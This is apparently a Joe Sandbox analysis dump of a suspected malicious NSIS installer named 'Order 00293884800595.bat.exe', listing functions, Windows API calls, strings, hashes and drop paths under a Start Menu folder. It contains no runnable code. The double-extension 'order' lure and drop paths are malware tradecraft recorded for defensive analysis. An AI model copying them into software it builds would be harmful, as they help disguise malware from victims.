Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd

Similarity

API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
String ID:
API String ID: 2972824698-0
Opcode ID: 1750d852ef655aad6943f12ff86d7c5be13c4aa94793d558f94d59855ccbac7d
Instruction ID: 2907458289dc89520fdc1db2e5a40f60bb15031deda838765eaf0f6b46983df9
Opcode Fuzzy Hash: 1750d852ef655aad6943f12ff86d7c5be13c4aa94793d558f94d59855ccbac7d
Instruction Fuzzy Hash: 0EF05B31905112DBCF20ABA55D849EF71E4DB0135CB11413FF501F21D2D7BC4A46DAAE

Function 004014D6 Relevance: 1.3, APIs: 1, Instructions: 19sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00000000), ref: 004014E9

Memory Dump Source

Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 1086b86eff6ccb0646e334d3d3a43b9eec11b9d4dc04b4a1abbda41f1d779818
Instruction ID: 2b610f9d6ca2559d84a6cccd890523da06de060bf9d54f72eb9b50da0c514afd
Opcode Fuzzy Hash: 1086b86eff6ccb0646e334d3d3a43b9eec11b9d4dc04b4a1abbda41f1d779818
Instruction Fuzzy Hash: 1CD05E73B142009BDB60DBB8BEC445F73E4E7403257304837E502E2092E5788946861C

Non-executed Functions

Function 004047BF Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 274stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 0040480E
SetWindowTextA.USER32(00000000,?), ref: 00404838
SHBrowseForFolderA.SHELL32(?,00429860,?), ref: 004048E9
CoTaskMemFree.OLE32(00000000), ref: 004048F4
lstrcmpiA.KERNEL32(Call,0042A488), ref: 00404926
lstrcatA.KERNEL32(?,Call), ref: 00404932
SetDlgItemTextA.USER32(?,000003FB,?), ref: 00404944

Part of subcall function 00405987: GetDlgItemTextA.USER32(?,?,00000400,0040497B), ref: 0040599A

Part of subcall function 00406587: CharNextA.USER32(0000000C,*?|<>/":,00000000,?,763F3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Order 00293884800595.bat.exe",004033B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,00000008,0000000A,0000000C), ref: 004065DF
Part of subcall function 00406587: CharNextA.USER32(0000000C,0000000C,0000000C,00000000,?,763F3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Order 00293884800595.bat.exe",004033B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,00000008,0000000A,0000000C), ref: 004065EC
Part of subcall function 00406587: CharNextA.USER32(0000000C,?,763F3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Order 00293884800595.bat.exe",004033B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,00000008,0000000A,0000000C), ref: 004065F1
Part of subcall function 00406587: CharPrevA.USER32(0000000C,0000000C,763F3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Order 00293884800595.bat.exe",004033B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,00000008,0000000A,0000000C), ref: 00406601

GetDiskFreeSpaceA.KERNEL32(00429458,?,?,0000040F,?,00429458,00429458,?,00000001,00429458,?,?,000003FB,?), ref: 00404A02
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404A1D

Part of subcall function 00404B76: lstrlenA.KERNEL32(0042A488,0042A488,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404A91,000000DF,00000000,00000400,?), ref: 00404C14
Part of subcall function 00404B76: wsprintfA.USER32 ref: 00404C1C
Part of subcall function 00404B76: SetDlgItemTextA.USER32(?,0042A488), ref: 00404C2F

Strings

Call, xrefs: 00404920, 00404925, 00404930
G8g, xrefs: 00404A79
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes, xrefs: 0040490F
A, xrefs: 004048E2

Memory Dump Source

Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes$Call$G8g
API String ID: 2624150263-1033649006
Opcode ID: 0a9a22de57e54a42c41f7f9c473854a5632b4b75f318642da20d5b1a73d2513c
Instruction ID: f53f9ae5ebeaccab956e1b2ad526c51027fc30446c854342799b5ba7b8d0bc76
Opcode Fuzzy Hash: 0a9a22de57e54a42c41f7f9c473854a5632b4b75f318642da20d5b1a73d2513c
Instruction Fuzzy Hash: BAA172F1A00209ABDB11AFA5CD45AAF76B8EF84314F14807BF611B62D1D77C89418F6D

Function 00402198 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(0040851C,?,00000001,0040850C,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040221D
MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,0040850C,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004022CF

Strings

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\Tyndstegsfilets\Figurmrkerne, xrefs: 0040225D

Memory Dump Source

Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd

Similarity

API ID: ByteCharCreateInstanceMultiWide
String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\Tyndstegsfilets\Figurmrkerne
API String ID: 123533781-171433923
Opcode ID: 26e4af273d4ad834d7dd4ca4c27adc144b69110a5e0929a66cb48c7bfc0a4cbf
Instruction ID: 9693176738af107330769ac86e8646dde0b712c02a361864b0ed1875b7ced88a
Opcode Fuzzy Hash: 26e4af273d4ad834d7dd4ca4c27adc144b69110a5e0929a66cb48c7bfc0a4cbf
Instruction Fuzzy Hash: DB511971A00208AFDF00EFA4CA88A9D7BB5FF48314F2045BAF505FB2D1DA799981CB54

Function 004027CF Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 004027DE

Memory Dump Source

Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 930922f26d5cdd011eb09c6a8250f7f43846b17323c9774391e4e916de6dacb1
Instruction ID: 474e59c826447b87e47a37c01b73ad662870a85b7ff57bc711f4e8679485c19e
Opcode Fuzzy Hash: 930922f26d5cdd011eb09c6a8250f7f43846b17323c9774391e4e916de6dacb1
Instruction Fuzzy Hash: 9CF0A771605110DFDB51EBA49E49AEE77689F21314F6005BBE141F20C2C6B889469B2E

Function 00406AFA Relevance: .3, Instructions: 334COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa1aee8a5b3a43351eb0af44d038224c2164fb65a2c69693e5a9d071f73749d8
Instruction ID: 8768c5d39ca9d5d04b1d74764d0b3cf6a08d2071900a395e822ff8491b177041
Opcode Fuzzy Hash: aa1aee8a5b3a43351eb0af44d038224c2164fb65a2c69693e5a9d071f73749d8
Instruction Fuzzy Hash: D0E18B7190470ACFDB24CF58C880BAAB7F1FB44305F15842EE497A72D1E738AA95CB14

Function 004072D1 Relevance: .3, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d4d4038b428717fbb616dadee5392a57e0a8d9c6ebddc8936aa8167a04c56aa
Instruction ID: 112ec8b08e22b9c6c3aeb56eb94a2e19ac2cef272eed527e1014fed5102c6f46
Opcode Fuzzy Hash: 8d4d4038b428717fbb616dadee5392a57e0a8d9c6ebddc8936aa8167a04c56aa
Instruction Fuzzy Hash: 33C13631E04219DBCF18CF68D8905EEBBB2BF98314F25866AD85677380D734A942CF95

Function 00404D32 Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 491windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404D49
GetDlgItem.USER32(?,00000408), ref: 00404D56
GlobalAlloc.KERNEL32(00000040,?), ref: 00404DA5
LoadImageA.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404DBC
SetWindowLongA.USER32(?,000000FC,00405345), ref: 00404DD6
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404DE8
ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404DFC
SendMessageA.USER32(?,00001109,00000002), ref: 00404E12
SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404E1E
SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404E2E
DeleteObject.GDI32(00000110), ref: 00404E33
SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404E5E
SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404E6A
SendMessageA.USER32(?,00001100,00000000,?), ref: 00404F04
SendMessageA.USER32(?,0000110A,00000003,00000110), ref: 00404F34

Part of subcall function 00404362: SendMessageA.USER32(00000028,?,00000001,00404192), ref: 00404370

SendMessageA.USER32(?,00001100,00000000,?), ref: 00404F48
GetWindowLongA.USER32(?,000000F0), ref: 00404F76
SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404F84
ShowWindow.USER32(?,00000005), ref: 00404F94
SendMessageA.USER32(?,00000419,00000000,?), ref: 0040508F
SendMessageA.USER32(?,00000147,00000000,00000000), ref: 004050F4
SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00405109
SendMessageA.USER32(?,00000420,00000000,00000020), ref: 0040512D
SendMessageA.USER32(?,00000200,00000000,00000000), ref: 0040514D
ImageList_Destroy.COMCTL32(?), ref: 00405162
GlobalFree.KERNEL32(?), ref: 00405172
SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 004051EB
SendMessageA.USER32(?,00001102,?,?), ref: 00405294
SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 004052A3
InvalidateRect.USER32(?,00000000,00000001), ref: 004052CE
ShowWindow.USER32(?,00000000), ref: 0040531C
GetDlgItem.USER32(?,000003FE), ref: 00405327
ShowWindow.USER32(00000000), ref: 0040532E

Strings

, xrefs: 00405306
G8g, xrefs: 004052D4
N, xrefs: 00404FCD
M, xrefs: 00404EEC

Memory Dump Source

Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd

Similarity

API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $G8g$M$N
API String ID: 2564846305-1825387520
Opcode ID: 4df1eefe35e68a6c7fa34c5b60be6288f9ea88f6771e326f729b6c61956ac8d6
Instruction ID: b1cb089e499fd84ad02b8b6dcb50706d58213328e80d7969948961eab3192630
Opcode Fuzzy Hash: 4df1eefe35e68a6c7fa34c5b60be6288f9ea88f6771e326f729b6c61956ac8d6
Instruction Fuzzy Hash: B1027DB0A00609AFDF209F94DD45AAE7BB5FB44354F50817AFA10BA2E1C7789D42CF58

Function 00404498 Relevance: 40.5, APIs: 19, Strings: 4, Instructions: 202windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 00404523
GetDlgItem.USER32(00000000,000003E8), ref: 00404537
SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 00404555
GetSysColor.USER32(?), ref: 00404566
SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00404575
SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404584
lstrlenA.KERNEL32(?), ref: 00404587
SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404596
SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004045AB
GetDlgItem.USER32(?,0000040A), ref: 0040460D
SendMessageA.USER32(00000000), ref: 00404610
GetDlgItem.USER32(?,000003E8), ref: 0040463B
SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 0040467B
LoadCursorA.USER32(00000000,00007F02), ref: 0040468A
SetCursor.USER32(00000000), ref: 00404693
LoadCursorA.USER32(00000000,00007F00), ref: 004046A9
SetCursor.USER32(00000000), ref: 004046AC
SendMessageA.USER32(00000111,00000001,00000000), ref: 004046D8
SendMessageA.USER32(00000010,00000000,00000000), ref: 004046EC

Strings

Call, xrefs: 00404666
G8g, xrefs: 004044B8
N, xrefs: 00404629
cD@, xrefs: 00404697

Memory Dump Source

Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: Call$G8g$N$cD@
API String ID: 3103080414-1343905038
Opcode ID: 0d552c78708d8b6c3e6a9e133e2a55d80eb6ec1b6100387134d0e82e0d806a6f
Instruction ID: 43684ccacc2d8fb7b4e0a1eb44f66cc69a0b9750f41782283b4d1566cbdab7d9
Opcode Fuzzy Hash: 0d552c78708d8b6c3e6a9e133e2a55d80eb6ec1b6100387134d0e82e0d806a6f
Instruction Fuzzy Hash: 106193B1A00209BBDB109F61DD45F6A3BA9FB84754F10443AFB057B1D1C7B8A951CF98

Function 00401000 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectA.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextA.USER32(00000000,humpende Setup,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

humpende Setup, xrefs: 00401150
F, xrefs: 0040100C

Memory Dump Source

Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F$humpende Setup
API String ID: 941294808-3363781941
Opcode ID: 036095489b744d328a0284f3af7f80ab3f3a11b0609df675fc3b160fbcb80c66
Instruction ID: 3ddd31971ff36fa992edb7b0d2f538087f25d398410520a6441e316a3758f4e4
Opcode Fuzzy Hash: 036095489b744d328a0284f3af7f80ab3f3a11b0609df675fc3b160fbcb80c66
Instruction Fuzzy Hash: 2E419C71800209AFCB059F95CE459BFBBB9FF44314F00842EF591AA1A0CB349955DFA4

Function 00405EF6 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 129memorystringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00406087,?,?), ref: 00405F27
GetShortPathNameA.KERNEL32(?,0042C218,00000400), ref: 00405F30

Part of subcall function 00405D85: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FE0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D95
Part of subcall function 00405D85: lstrlenA.KERNEL32(00000000,?,00000000,00405FE0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405DC7

GetShortPathNameA.KERNEL32(?,0042C618,00000400), ref: 00405F4D
wsprintfA.USER32 ref: 00405F6B
GetFileSize.KERNEL32(00000000,00000000,0042C618,C0000000,00000004,0042C618,?,?,?,?,?), ref: 00405FA6
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405FB5
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FED
SetFilePointer.KERNEL32(0040A3D0,00000000,00000000,00000000,00000000,0042BE18,00000000,-0000000A,0040A3D0,00000000,[Rename],00000000,00000000,00000000), ref: 00406043
GlobalFree.KERNEL32(00000000), ref: 00406054
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040605B

Part of subcall function 00405E20: GetFileAttributesA.KERNELBASE(00000003,00402F71,C:\Users\user\Desktop\Order 00293884800595.bat.exe,80000000,00000003,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00405E24
Part of subcall function 00405E20: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00405E46

Strings

[Rename], xrefs: 00405FD5, 00405FE7
%s=%s, xrefs: 00405F61

Memory Dump Source

Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %s=%s$[Rename]
API String ID: 2171350718-1727408572
Opcode ID: 569be3a98da05520ad95d37df462ccc6378b119762144e883bf0616c118c920a
Instruction ID: da8ce3bfdf00fcfed17b5edaf8d9799a0bf0ff3a482d4f6cc2fc7d52a36fe9c3
Opcode Fuzzy Hash: 569be3a98da05520ad95d37df462ccc6378b119762144e883bf0616c118c920a
Instruction Fuzzy Hash: 3D3135312407117BC220AB65AC88F6B3A5CDF41758F16003BFA02F72D2DE7C98558ABD

Function 00406587 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextA.USER32(0000000C,*?|<>/":,00000000,?,763F3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Order 00293884800595.bat.exe",004033B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,00000008,0000000A,0000000C), ref: 004065DF
CharNextA.USER32(0000000C,0000000C,0000000C,00000000,?,763F3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Order 00293884800595.bat.exe",004033B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,00000008,0000000A,0000000C), ref: 004065EC
CharNextA.USER32(0000000C,?,763F3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Order 00293884800595.bat.exe",004033B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,00000008,0000000A,0000000C), ref: 004065F1
